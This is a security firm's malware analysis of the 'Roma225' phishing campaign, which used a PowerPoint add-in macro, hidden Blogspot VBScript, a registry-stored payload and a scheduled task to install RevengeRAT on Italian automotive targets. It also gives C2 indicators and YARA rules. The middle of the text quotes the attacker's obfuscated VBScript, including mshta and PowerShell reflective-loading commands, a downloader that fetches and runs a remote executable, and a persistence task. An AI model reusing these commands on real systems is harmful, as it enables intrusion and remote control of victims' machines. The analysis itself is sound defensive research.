# The Enigmatic “Roma225” Campaign **[blog.yoroi.company/research/the-enigmatic-roma225-campaign](https://blog.yoroi.company/research/the-enigmatic-roma225-campaign/)** ZLAB-YOROI December 27, 2018 ----- ## Introduction The Cybaze-Yoroi ZLab researchers investigated a recent espionage malware implant weaponized to target companies in the Italian automotive sector. The malware was spread through well written phishing email trying to impersonate a senior partner of one of the major Brazilian business law firms: “Veirano Advogados”. The malicious email intercepted during the CSDC operations contains a PowerPoint add-in document (“.ppa” extension), armed with auto-open VBA macro code. _Figure 1. Popup displayed at the .ppa file opening_ ## Technical analysis The macro code in the .ppa file contains a simple instruction invoking the “mshta.exe” tool to download and execute the next-stage of the dropper retrieved from “hxxps://minhacasaminhavidacdt.blogspot[.com/”. ----- _Figure 2. Macro extracted from .ppa document_ The Blogspot hosted web page downloaded by mshta.exe appears innocent-looking to a quick skim through: opening it into the browser shows a perfectly rendered work-in progress blog page. _Figure 3. Home page of the Blogger drop url_ But a deeper inspection of its source code reveals an interesting snippet inserted into an invisible blog post: this ghost article contains VBScript code. _Figure 4. Visual Basic Script hidden behind the web page_ It’s funny to see the malware author tried to attribute the paternity of the script to “Microsoft Corp.”, adding pieces of comments belonging to legit Microsoft utilities: ----- _‘ Copyright: Microsoft Corp._ _‘_ _‘ This script is designed to be used only for scheduled tasks(s)._ _‘ There is no extensive error check, and will not dump the output from the Powershell_ _CmdLet._ _‘_ _‘ Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}_ These comments are in fact part of the “SyncAppvPublishingServer” utility, commonly deployed into Windows 10 machines at “C:\Windows\System32\SyncAppvPublishingServer.vbs”. Anyway, the remaining part of the script is responsible to execute a series of malicious actions: Store a base64 encoded version of the “RevengeRAT” payload into registry key located at “HKCU\AppEvents\Values” CreateObject("Wscript.Shell").regwrite "HKCU\AppEvents\Values", "TVqQAAMAAAAEAAAA//8AALgAAA.....[continue]", "REG_SZ" Decode and execute of the stored payload Set A0102030405 = CreateObject("WScript.Shell") Dim CDT0908087CDT CDT0908087CDT = "cmd." + "exe /C rundll32." + "exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""cmd." + "exe /c power" + "shell -" + "Execution" + "Policy Bypass -windows" + "tyle hidden -noexit -Command [Reflection." + "Assembly]::Load([Convert]::FromBase64String((GetItemProperty HKCU:\AppEvents).Values)).EntryPoint" + ".Invoke($N" + "ull,$" + "Null)"",0,true);" A0102030405.run CDT0908087CDT, vbHide Create and execute another VBScript into “%AppData%\Local\Temp\Z3j.vbs”, capable to download a new payload from the remote destination “hxxp://cdtmaster.com[.]br” Set XbonXo = CreateObject("WScript.Shell") Dim XoowA83AC XoowA83AC = "c" + "M" + "d /c cd %TEMP% &@echo Z6h = ""h" + "t" + "tp://cdtmaster.com.br/Document." + "mp3"">>Z3j.vbs &@echo M2l = M5t(""R]Qc[S\b>Z3j.vbs &@echo Set M1s = CreateObject(M5t("" [af[Z@>Z3j.vbs &@echo M1s.Open M5t(""USb""), Z6h, False>>Z3j.vbs &@echo M1s.send ("""")>>Z3j.vbs &@echo Set E3i = CreateObject(M5t(""OR]RP>Z3j.vbs &@echo E3i.Open>>Z3j.vbs &@echo E3i.Type = 1 >>Z3j.vbs &@echo E3i.Write M1s.ResponseBody>>Z3j.vbs & @echo E3i.Position = 0 >>Z3j.vbs &@echo E3i.SaveToFile M2l, 2 >>Z3j.vbs &@echo E3i.Close>>Z3j.vbs &@echo function M5t(N3y) >> Z3j.vbs &@echo For S2r = 1 To Len(N3y) >>Z3j.vbs &@echo E0k = Mid(N3y, S2r, 1) >>Z3j.vbs &@echo E0k = Chr(Asc(E0k)- 14) >>Z3j.vbs &@echo G3f = G3f + E0k >> Z3j.vbs &@echo Next >>Z3j.vbs &@echo M5t = G3f >>Z3j.vbs &@echo End Function >>Z3j.vbs& Z3j.vbs &dEl Z3j.vbs & timeout 2 & DOCUMENT.EXE" XbonXo.Run XoowA83AC, vbHide ----- “hxxps://pocasideiascdt.blogspot[.]com/” parameter every two hours. This URL points to web page which actually is a mirror of the “https://minhacasaminhavidacdt.blogspot[.]com/” one. Dim OUGo57658586GFFJHG Set OUGo57658586GFFJHG = CreateObject("WScript.Shell") asdmmmc= "c" + "Md /c Sc" + "hTa" + "sks /Cre" + "ate /sc MIN" + "UTE /MO 120 /TN OfficeData /TR ""m" + "sh" + "ta." + "exe h" + "ttp" + "s://pocasideiascdt.blogspot.com/"" /F " OUGo57658586GFFJHG.Run asdmmmc, vbHide self.close _Figure 5. Scheduled task for persistency_ Summing up, the last stages of the infection chain are designed to install a RevengeRAT variant hidden into a regkey and run the “outlook.exe” executable extracted by the “Document.exe” binary, retrieved from “hxxp://cdtmaster.com[.]br/Document.mp3”. The following image briefly shows the malware infection chain: ----- _Figure 6. Roma255 infection chain_ ### RevengeRAT Payload Once executed, the RAT immediately contacts its command and control servers sending victim machine’s information. In the analyzed sample, the author configured two different C2 destinations: “office365update[.]duckdns.org” and “systen32.ddns[.]net“. _Figure 7 Configuration of the RevengeRAT_ ----- both the remote C2 were down, so it was only possible to emulate the server behavior in order to analyze the information sent by the RAT. Anyway, the malware establishes a TCP connection with the server and sends to it the following stream: _Figure 8. RevengeRAT check-in data_ At first sight, it’s possible to spot a repeated sequence of chars used as separator between the data fields: **_roma225_** This string have been chosen by the attacker during the preparation of the malware, using the customization functionalities provided by the RevengeRAT builder. Splitting and decoding the data stream, information becomes clearer: _Figure 9. decoded check-in data_ As told before, the C2s were unresponsive at time of writing, however their latest IP resolution indicates the infrastructure of the attacker could be located in different countries. For instance, the domain “office365update[.]duckdns.org” resolved to the 184.75.209.169 IP addresss, geolocated in Canada. ----- Moreover, “systen32.ddns[.]net” resolved to the 138.36.3.228 IP, geolocated in Brazil. ## Document.exe The “Document.exe” file is hosted at “cdtmaster.com[.]br” and is actually downloaded into the victim machine by the “Z3j.vbs” script. This PE32 file is characterized by the Pokemon Megaball image used as program icon and its unique purpose is to deploy and run the “Outlook.exe” payload. Extracting static PE information from this last sample, reveals references to the “SendBlaster” application, a program used to deliver newsletters. Here, another interesting fact comes up: this product is currently developed by the Italian firm eDisplay Srl, so, in addition to the “roma225” separator, represents another direct reference to the Italian landscape. _Figure 10. Outlook.exe_ _static information_ When the “Outlook.exe” payload is executed, it remains apparently quiet: no outgoing network traffic or file system modifications; however it binds a listening TCP socket on localhost: “tcp://127.0.0.1:49356“. Cybaze-Yoroi ZLab researchers are still dissecting the _Outlook.exe sample to extract its_ real behavior. ----- After this first analysis, it’s difficult to attribute the attack to a specific threat actor. In the past, RevengeRAT variants were also used by APT groups such as The Gorgon [Group, the enigmatic threat actor tracked by the Unit42 researchers, author of cyber](https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/) espionage campaigns against UK, Spain, Russia and US governmental organization. However, the source code of the RAT has been publicly leaked few years ago and could be actually part of a multitude of cyber arsenals, more or less sophisticated. Anyway, there are TTP in common with Unit42 report, such as the usage of shared infrastructure (in the specific case the Blogger service) as drop-server and other popular RAT as final backdoor (i.e. njRAT). In fact, the “cdtmaster.com.]br” hosts other suspicious files such as the “nj.mp3” binary, which actually is a njRAT variant. All the other files are still under investigation. _Figure 11. Malware hosted on ctdmaster.com[.br_ # Indicator Of Compromise Dropurl: hxxps://minhacasaminhavidacdt.blogspot[.]com hxxps://pocasideiascdt.blogspot[.]com/ hxxp://cdtmaster.]com.br 177.85.98.242 C2 (RevengeRAT): office365update[.]duckdns.org 184.75.209.169 systen32.ddns[.]net ----- _HKCU\AppEvents\<”Values”>_ Hash: 4211e091dfb33523d675d273bdc109ddecf4ee1c1f5f29e8c82b9d0344dbb6a1 e8a765ec824881e1e78defd7c011da735f3e3b954aaf93a4282b6455a1b9afcc 702e5cc9462e464c8c29c832fe0d1ecd5cd7740cc2cbceecfd70e566da8194a1 # Yara Rules rule Rooming_List_Advogados_e_Seguranca_21_12_2018{ meta: description = "Yara Rule for revengeRAT_roma225" author = "Cybaze Zlab_Yoroi" last_updated = "2018-12-21" tlp = "white" category = "informational" strings: $a1 = {56 00 42 00 41} $a2 = {4D F3 64 75 6C 6F 31} $a3 = {4D 73 68 74 61} $b = "Auto_Open" $c = "Shell" $d = "https://minhacasaminhavidacdt.blogspot.com" $e = {D0 CF 11 E0 A1 B1 1A E1} condition: $b and $c and $d and $e and 1 of ($a*) } rule revengeRAT_21_12_2018{ meta: description = "Yara Rule for revengeRAT_roma225" author = "Cybaze Zlab_Yoroi" last_updated = "2018-12-21" tlp = "white" category = "informational" strings: $a1 = "FromBase64String" $a2 = {17 00 38 72 1F 00 00 20 D7 ?? ?? ?? 20 47} $b = {4D 5A} $c = {65 5A 33 78 63 6B 4A 39 4B 51 47 4B 50 36 33 55 37 39 67} $d = "RevengeFUD0000000.exe" $e = "7ec6b2a4-a8e7" condition: $b and $c and $d and $e and 1 of ($a*) } ----- meta: description = "Yara Rule for revengeRAT_roma225" author = "Cybaze Zlab_Yoroi" last_updated = "2018-12-21" tlp = "white" category = "informational" strings: $a1 = "Dispose" $a2 = {53 00 65 00 6E 00 64 00 42 00 6C 00 61 00 73 00 74 00 65 00 72} $b = {4D 5A} $c = {49 4D 4E 64 48 49 37 49 34 69 57 37 46 6E 73 6F 49 38} $d = "ScreenBooking4" $e = "capturaTela" condition: $b and $c and $d and $e and 1 of ($a*) } rule Document_exe_21_12_2018{ meta: description = "Yara Rule for revengeRAT_roma225" author = "Cybaze Zlab_Yoroi" last_updated = "2018-12-21" tlp = "white" category = "informational" strings: $a1 = "Dispose" $a2 = {F5 38 7E 26 EA 99} $b = {4D 5A} $c = {6C 38 6E 78 4A 79 30 6E 34 616D 4A 74 4F 67 00 57} $d = "4System" $e = {53 6B 79 70 65 20 54 65 63 68 6E 6F 6C 6F 67 69 65 73} condition: $b and $c and $d and $e and 1 of ($a*) } _This blog post was authored by Testa Davide, Antonio Farina, Luca Mella, Antonio Pirozzi of_ _Cybaze-Yoroi Z-LAB_ -----